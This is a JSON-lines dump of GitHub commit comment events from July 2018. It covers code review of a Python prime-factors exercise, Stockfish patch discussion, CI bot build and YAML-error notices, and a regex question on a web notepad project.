{"id":"8019225225","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29835965,"position":21,"line":21,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:49:08Z","updated_at":"2018-07-25T21:49:08Z","author_association":"OWNER","body":"See above"}},"created_at":"2018-07-25T21:49:08Z"}
{"id":"8019226128","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29835970,"position":20,"line":20,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:49:20Z","updated_at":"2018-07-25T21:49:20Z","author_association":"OWNER","body":"`def prime_factors(number)`"}},"created_at":"2018-07-25T21:49:20Z"}
{"id":"8019229013","type":"CommitCommentEvent","actor":{"login":"mikadias5562"},"repo":{"name":"mikadias5562/imagens_kratos"},"payload":{"comment":{"id":29835973,"position":null,"line":null,"path":null,"commit_id":"9c2f0666f0eeff3d81f6b85c7745143bd65187dd","created_at":"2018-07-25T21:50:02Z","updated_at":"2018-07-25T21:50:02Z","author_association":"OWNER","body":"![4k](https://user-images.githubusercontent.com/38801913/43228185-3f1cd928-9037-11e8-807e-5da472463c96.jpg)\r\n![acao 1](https://user-images.githubusercontent.com/38801913/43228186-3f734326-9037-11e8-810b-f8707fa8cbfb.jpg)\r\n![animacao 1](https://user-images.githubusercontent.com/38801913/43228187-3fa32050-9037-11e8-9112-936d274cc1fb.jpg)\r\n![aventura 1](https://user-images.githubusercontent.com/38801913/43228188-3fd1f40c-9037-11e8-98f6-ec797f74cba4.jpg)\r\n![cine sky hd](https://user-images.githubusercontent.com/38801913/43228189-3fff9ed4-9037-11e8-8ac1-4063401066dc.jpg)\r\n![comedia 1](https://user-images.githubusercontent.com/38801913/43228190-403a43ea-9037-11e8-8f81-364ce5d4acc2.jpg)\r\n![crackle](https://user-images.githubusercontent.com/38801913/43228191-40635974-9037-11e8-9d8d-1959a81c6684.jpg)\r\n![drama 1](https://user-images.githubusercontent.com/38801913/43228193-40a24a4e-9037-11e8-9d3b-f4712da083c0.jpg)\r\n![faroeste](https://user-images.githubusercontent.com/38801913/43228195-40e7be6c-9037-11e8-8701-ae7eb320de94.jpg)\r\n![ficcao cientifica 1](https://user-images.githubusercontent.com/38801913/43228197-411ada04-9037-11e8-9b40-24e57b3584c3.jpg)\r\n![filmes animes](https://user-images.githubusercontent.com/38801913/43228200-416245ec-9037-11e8-8654-3398df06cc3e.jpg)\r\n![filmes heroi](https://user-images.githubusercontent.com/38801913/43228201-419dbfa0-9037-11e8-8021-90ea5cbffac8.jpg)\r\n![gospel](https://user-images.githubusercontent.com/38801913/43228202-41f1620e-9037-11e8-9676-0af74d0d45b3.jpg)\r\n![guerra](https://user-images.githubusercontent.com/38801913/43228203-4228d9aa-9037-11e8-9a7a-cbea190d1d3f.jpg)\r\n![nostalgia](https://user-images.githubusercontent.com/38801913/43229016-b5c39114-9039-11e8-8d81-7754d1fb609b.jpg)\r\n![openload](https://user-images.githubusercontent.com/38801913/43229017-b5f54efc-9039-11e8-9f9e-a9f16c437cb8.jpg)\r\n![sd](https://user-images.githubusercontent.com/38801913/43229018-b6244b58-9039-11e8-951c-877f7ee83669.jpg)\r\n![terror 1](https://user-images.githubusercontent.com/38801913/43229019-b654d0d4-9039-11e8-94eb-7a9ad1d8e597.jpg)\r\n![lancamento 1](https://user-images.githubusercontent.com/38801913/43229363-e875e3b8-903a-11e8-9f53-31e235c5afd9.jpg)\r\n![romance 2](https://user-images.githubusercontent.com/38801913/43229389-fe7c4238-903a-11e8-9949-b30c8c4e2ff9.jpg)\r\n![top 250 imdb](https://user-images.githubusercontent.com/38801913/43229391-feaf0f4c-903a-11e8-8de5-d45dcbfb902f.jpg)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-25T21:50:02Z"}
{"id":"8019229452","type":"CommitCommentEvent","actor":{"login":"qex"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29835974,"position":null,"line":null,"path":null,"commit_id":"ed079828df250c3338b530f5c42e8415e213f0ce","created_at":"2018-07-25T21:50:09Z","updated_at":"2018-07-25T21:50:09Z","author_association":"CONTRIBUTOR","body":"Yeah, I can accept all these change but one.\r\n\r\nSo why change `'/^[a-z0-9]+$/i'` into `'/^[a-zA-Z0-9]+$/'` ?"}},"created_at":"2018-07-25T21:50:09Z"}
{"id":"8019229928","type":"CommitCommentEvent","actor":{"login":"mikadias5562"},"repo":{"name":"mikadias5562/imagens_kratos"},"payload":{"comment":{"id":29835976,"position":null,"line":null,"path":null,"commit_id":"9c2f0666f0eeff3d81f6b85c7745143bd65187dd","created_at":"2018-07-25T21:50:15Z","updated_at":"2018-07-25T21:50:15Z","author_association":"OWNER","body":"Categoria 1"}},"created_at":"2018-07-25T21:50:15Z"}
{"id":"8019231496","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29835980,"position":38,"line":38,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:50:36Z","updated_at":"2018-07-25T21:50:36Z","author_association":"OWNER","body":"the recursion is unnecessarry"}},"created_at":"2018-07-25T21:50:36Z"}
{"id":"8019231859","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29835984,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-25T21:50:41Z","updated_at":"2018-07-25T21:50:41Z","author_association":"NONE","body":"Congrats! But if both patches pass which one should be merged? :D"}},"created_at":"2018-07-25T21:50:41Z"}
{"id":"8019234573","type":"CommitCommentEvent","actor":{"login":"protonspring"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29835987,"position":null,"line":null,"path":null,"commit_id":"523450d3c2a924c51963494cd7b55f3114d1b058","created_at":"2018-07-25T21:51:19Z","updated_at":"2018-07-25T21:51:19Z","author_association":"OWNER","body":"Trying to remove HinderPassedPawn altogether.\r\n\r\nhttp://tests.stockfishchess.org/tests/view/5b58f09c0ebc5902bdb8946d"}},"created_at":"2018-07-25T21:51:19Z"}
{"id":"8019243405","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29836009,"position":33,"line":33,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:53:25Z","updated_at":"2018-07-25T21:53:25Z","author_association":"OWNER","body":"did you check if this compiled? this is actually mispelled. it should be\r\n`check_divisibility(number, i)`"}},"created_at":"2018-07-25T21:53:25Z"}
{"id":"8019248957","type":"CommitCommentEvent","actor":{"login":"stephenhmarsh"},"repo":{"name":"uluyol/homebrew-core"},"payload":{"comment":{"id":29836016,"position":null,"line":null,"path":null,"commit_id":"c377e6ebb3c7bc8fe6edf098e259d76e9935aacf","created_at":"2018-07-25T21:54:49Z","updated_at":"2018-07-25T21:54:49Z","author_association":"NONE","body":"thank you for this file in general.  I specifically need R without x stuff but _with_ cairo and it's nearly impossible to configure without a formula. \r\n\r\nI used some of your work in this file: https://github.com/stephenhmarsh/homebrew-group-project/blob/master/Formula/r.rb but i am new to hacking homebrew stuff so would love if you could host a tap of this r formula somewhere!!"}},"created_at":"2018-07-25T21:54:49Z"}
{"id":"8019254447","type":"CommitCommentEvent","actor":{"login":"Buff99"},"repo":{"name":"JDCTeam/manifests"},"payload":{"comment":{"id":29836034,"position":null,"line":null,"path":null,"commit_id":"962f0318ac1369ac15578de1a31be41105ecb7f5","created_at":"2018-07-25T21:56:11Z","updated_at":"2018-07-25T21:56:11Z","author_association":"CONTRIBUTOR","body":"derp"}},"created_at":"2018-07-25T21:56:11Z"}
{"id":"8019255292","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29836036,"position":null,"line":null,"path":null,"commit_id":"4949301cf592a8e059f49a86e65e60339a304e0c","created_at":"2018-07-25T21:56:23Z","updated_at":"2018-07-25T21:56:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-281](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-281).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-281-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T21:56:23Z"}
{"id":"8019261797","type":"CommitCommentEvent","actor":{"login":"pereorga"},"repo":{"name":"pereorga/minimalist-web-notepad"},"payload":{"comment":{"id":29836051,"position":null,"line":null,"path":null,"commit_id":"ed079828df250c3338b530f5c42e8415e213f0ce","created_at":"2018-07-25T21:58:03Z","updated_at":"2018-07-25T21:58:03Z","author_association":"OWNER","body":"Hi qex,\r\n\r\nThese are equivalent regular expressions, both should be fine. I changed it because I wanted to have the same expression here than in .htaccess and nginx instructions. I could have probably changed the other expressions, but I also like the idea of not using /i when is not required, makes the regex simpler in my opinion"}},"created_at":"2018-07-25T21:58:03Z"}
{"id":"8019265274","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/BasicCommands"},"payload":{"comment":{"id":29836061,"position":null,"line":null,"path":null,"commit_id":"e76995b8710e6e8e4882a5177dc6c516d72594ac","created_at":"2018-07-25T21:58:55Z","updated_at":"2018-07-25T21:58:55Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: mapping values are not allowed in this context\n(line 7, column 9) in /poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/BasicCommands/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ebd20d82-9055-11e8-8135-f665ed973a3c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T21:58:55Z"}
{"id":"8019265308","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29836062,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-25T21:58:56Z","updated_at":"2018-07-25T21:58:56Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-25T21:58:56Z"}
{"id":"8019266400","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/BasicCommands"},"payload":{"comment":{"id":29836065,"position":null,"line":null,"path":null,"commit_id":"9315b00e72c97a345ef52bd63a508a11a72ddcc4","created_at":"2018-07-25T21:59:12Z","updated_at":"2018-07-25T21:59:12Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: mapping values are not allowed in this context\n(line 7, column 9) in /poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/BasicCommands/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `f61a2b8a-9055-11e8-981a-48bdbdaf553d`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T21:59:12Z"}
{"id":"8019267783","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29836070,"position":58,"line":58,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T21:59:32Z","updated_at":"2018-07-25T21:59:32Z","author_association":"OWNER","body":"What? Why are you doing this again?"}},"created_at":"2018-07-25T21:59:32Z"}
{"id":"8019269499","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/BasicCommands"},"payload":{"comment":{"id":29836073,"position":null,"line":null,"path":null,"commit_id":"25bc43de7ee0888a7b69108c0901505b39e8bc8c","created_at":"2018-07-25T21:59:56Z","updated_at":"2018-07-25T21:59:56Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: mapping values are not allowed in this context\n(line 7, column 9) in /poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/BasicCommands/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `1033ff3c-9056-11e8-984c-e53a9566a318`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T21:59:56Z"}
{"id":"8019273031","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29836088,"position":52,"line":52,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T22:00:39Z","updated_at":"2018-07-25T22:00:39Z","author_association":"OWNER","body":"This is a triple-nested if loop. This algorithm can be optimized.\r\n\r\nYou never, ever need more than a double-nested for loop. If so, you need to abstract, re-think logic. This is called a code smell, and it warns you that this is unoptimal if not wrong."}},"created_at":"2018-07-25T22:00:39Z"}
{"id":"8019274513","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29836091,"position":59,"line":59,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T22:00:58Z","updated_at":"2018-07-25T22:00:58Z","author_association":"OWNER","body":"Wait this is quadruple nested? What?"}},"created_at":"2018-07-25T22:00:58Z"}
{"id":"8019277981","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29836100,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-25T22:01:43Z","updated_at":"2018-07-25T22:01:43Z","author_association":"NONE","body":"Yeah @31m059 I saw this. But I'm kinda curious - which patch is actually better? Probably we should try smth like [0;4] SPRT of this patches vs each other to have an idea."}},"created_at":"2018-07-25T22:01:43Z"}
{"id":"8019279191","type":"CommitCommentEvent","actor":{"login":"rochow"},"repo":{"name":"rochow/woocommerce"},"payload":{"comment":{"id":29836104,"position":null,"line":null,"path":null,"commit_id":"f9f6acbe67a30a24a139f5b019eac19234464ddb","created_at":"2018-07-25T22:02:00Z","updated_at":"2018-07-25T22:02:00Z","author_association":"OWNER","body":"Note: I don't fully understand the pre 2.4 DB schema about slugs so that needs checking"}},"created_at":"2018-07-25T22:02:00Z"}
{"id":"8019280045","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29836107,"position":null,"line":null,"path":null,"commit_id":"d369e0d124bdaec74c4d8884451e6e81300d46be","created_at":"2018-07-25T22:02:13Z","updated_at":"2018-07-25T22:02:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-triag](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-triag).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-triag-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T22:02:13Z"}
{"id":"8019282886","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29836114,"position":null,"line":null,"path":null,"commit_id":"d35fa9d5668d9e67faad80ba0322aa2ea955e2cf","created_at":"2018-07-25T22:02:55Z","updated_at":"2018-07-25T22:02:55Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-953](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-953).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-953-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T22:02:55Z"}
{"id":"8019285602","type":"CommitCommentEvent","actor":{"login":"alwey"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29836117,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-25T22:03:38Z","updated_at":"2018-07-25T22:03:38Z","author_association":"NONE","body":"Interesting:The counting rules influence the relative endgame values of the pieces or sets of pieces. Under Western counting they are different from those optimal for Makruk counting."}},"created_at":"2018-07-25T22:03:38Z"}
{"id":"8019290557","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29836132,"position":32,"line":32,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T22:04:57Z","updated_at":"2018-07-25T22:04:57Z","author_association":"OWNER","body":"This is a weird algorithm. You start from the number and skip down. \r\n\r\nWe should take advantage of that thing I forget what it's called that you can only go up to the `sqrt(n)+ 1` (which I see you kind of understand)."}},"created_at":"2018-07-25T22:04:57Z"}
{"id":"8019291041","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29836134,"position":null,"line":null,"path":null,"commit_id":"5e88303b37b344a46202e337c11510f57bec8166","created_at":"2018-07-25T22:05:05Z","updated_at":"2018-07-25T22:05:05Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-49](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-49).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-49-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T22:05:05Z"}
{"id":"8019298263","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29836149,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-25T22:06:59Z","updated_at":"2018-07-25T22:06:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T22:06:59Z"}
{"id":"8019312467","type":"CommitCommentEvent","actor":{"login":"michaelficarra"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":29836168,"position":null,"line":null,"path":null,"commit_id":"551335eedf62261299af7aafdfc896b3aef8de67","created_at":"2018-07-25T22:10:47Z","updated_at":"2018-07-25T22:10:47Z","author_association":"MEMBER","body":"@anselmbradford It's about expressing intent. You don't actually want the `hasOwnProperty` anywhere in the chain, preferring the ones nearer to the object. You really intent to use the one from `Object.prototype`, so you should just call it directly."}},"created_at":"2018-07-25T22:10:47Z"}
{"id":"8019313055","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"polilluminato/eobot-api"},"payload":{"comment":{"id":29836169,"position":null,"line":null,"path":null,"commit_id":"0b97f9fd9a6b800f96e2637cea3c54e007c1eb90","created_at":"2018-07-25T22:10:57Z","updated_at":"2018-07-25T22:10:57Z","author_association":"NONE","body":"0b97f9f"}},"created_at":"2018-07-25T22:10:57Z"}
{"id":"8019315759","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29836182,"position":null,"line":null,"path":null,"commit_id":"d22bbc47adbac828b263f0f410f190dac7705e84","created_at":"2018-07-25T22:11:42Z","updated_at":"2018-07-25T22:11:42Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-548](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-548).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-548-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T22:11:42Z"}
{"id":"8019318234","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29836192,"position":null,"line":null,"path":null,"commit_id":"02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c","created_at":"2018-07-25T22:12:22Z","updated_at":"2018-07-25T22:12:22Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2945 of 2945 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-02ba8e2b4c1a000c09f5300aa40c5a9b4066e09c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T22:12:22Z"}
{"id":"8019319456","type":"CommitCommentEvent","actor":{"login":"jesusmaldonado"},"repo":{"name":"jesusmaldonado/algorithms"},"payload":{"comment":{"id":29836195,"position":30,"line":30,"path":"problems/python/prime_factors.py","commit_id":"b36fefa47a50580e8a59f222edae7956cf24113a","created_at":"2018-07-25T22:12:41Z","updated_at":"2018-07-25T22:12:41Z","author_association":"OWNER","body":"Six variable declarations is a code smell. A proper algorithm for a problem like this requires a couple (1-3) at most.\r\n\r\nAlways ask yourself what is minimal, without like going crazy and making a one-line function no human can read."}},"created_at":"2018-07-25T22:12:41Z"}
{"id":"8019321330","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29836198,"position":null,"line":null,"path":null,"commit_id":"dfa4edb71c52d7a4c8ea0108e3739f9160409233","created_at":"2018-07-25T22:13:12Z","updated_at":"2018-07-25T22:13:12Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-281](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-281).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-281-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T22:13:12Z"}
{"id":"8019325440","type":"CommitCommentEvent","actor":{"login":"jts"},"repo":{"name":"skoren/NanoGrid"},"payload":{"comment":{"id":29836211,"position":29,"line":84,"path":"nanoParallelSGE.sh","commit_id":"80423f20cf1babc2f060d9e1e52732d37696a2a9","created_at":"2018-07-25T22:14:16Z","updated_at":"2018-07-25T22:14:16Z","author_association":"NONE","body":"This is not quite right, `--consensus` is now simply a flag and you should use the existing `-o` option for the output file. Sorry for changing the interface!"}},"created_at":"2018-07-25T22:14:16Z"}
{"id":"8019328598","type":"CommitCommentEvent","actor":{"login":"Chtau"},"repo":{"name":"Chtau/BlazorWebWinClient"},"payload":{"comment":{"id":29836220,"position":null,"line":null,"path":null,"commit_id":"8f9f698cb19e77541845cc78e6d5510a47ad7b28","created_at":"2018-07-25T22:15:08Z","updated_at":"2018-07-25T22:15:08Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-25T22:15:08Z"}
{"id":"8019334040","type":"CommitCommentEvent","actor":{"login":"qwertychouskie"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29836242,"position":null,"line":null,"path":null,"commit_id":"33e708fb517079d37ba10ca3714b717625aa1354","created_at":"2018-07-25T22:16:38Z","updated_at":"2018-07-25T22:16:38Z","author_association":"NONE","body":"Is it possible to at least get 1366x768?  It's a pretty common resolution."}},"created_at":"2018-07-25T22:16:38Z"}
{"id":"8019337407","type":"CommitCommentEvent","actor":{"login":"skoren"},"repo":{"name":"skoren/NanoGrid"},"payload":{"comment":{"id":29836252,"position":29,"line":84,"path":"nanoParallelSGE.sh","commit_id":"80423f20cf1babc2f060d9e1e52732d37696a2a9","created_at":"2018-07-25T22:17:35Z","updated_at":"2018-07-25T22:17:35Z","author_association":"OWNER","body":"thanks, should be correct now.\n\n> On Jul 25, 2018, at 6:14 PM, Jared Simpson <notifications@github.com> wrote:\n> \n> This is not quite right, --consensus is now simply a flag and you should use the existing -o option for the output file. Sorry for changing the interface!\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/skoren/NanoGrid/commit/80423f20cf1babc2f060d9e1e52732d37696a2a9#commitcomment-29836211>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AA4XVtBKTvzG6jvPGzMuQb_mbnO75CV0ks5uKO24gaJpZM4Vg4fW>.\n> \n\n"}},"created_at":"2018-07-25T22:17:35Z"}
{"id":"8019338131","type":"CommitCommentEvent","actor":{"login":"medozero"},"repo":{"name":"gekkowarez/gekko-neuralnet"},"payload":{"comment":{"id":29836256,"position":null,"line":null,"path":null,"commit_id":"81c17cab28a941b8d2f60172ad20456ed37572a3","created_at":"2018-07-25T22:17:47Z","updated_at":"2018-07-25T22:17:47Z","author_association":"NONE","body":"same here i trained the network for more than 10 hours and the trained file get created but every time i close gekko and run it again , i found same results in the trained file .\r\n\r\nhow can we verify if the network already continue its previous training ?"}},"created_at":"2018-07-25T22:17:47Z"}
{"id":"8019341651","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29836265,"position":null,"line":null,"path":null,"commit_id":"a45ec3c750d72408b35d35cfabe30e962e65b4c5","created_at":"2018-07-25T22:18:47Z","updated_at":"2018-07-25T22:18:47Z","author_association":"OWNER","body":"see PR https://github.com/official-stockfish/Stockfish/pull/1701"}},"created_at":"2018-07-25T22:18:47Z"}
{"id":"8019344059","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/BasicCommands"},"payload":{"comment":{"id":29836272,"position":null,"line":null,"path":null,"commit_id":"480948bddc558fa251fbd10ac46e9b7b14ab7dcd","created_at":"2018-07-25T22:19:29Z","updated_at":"2018-07-25T22:19:29Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: mapping values are not allowed in this context\n(line 7, column 9) in /poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/BasicCommands/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `cb85ce08-9058-11e8-8f20-e31f970e196b`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T22:19:29Z"}
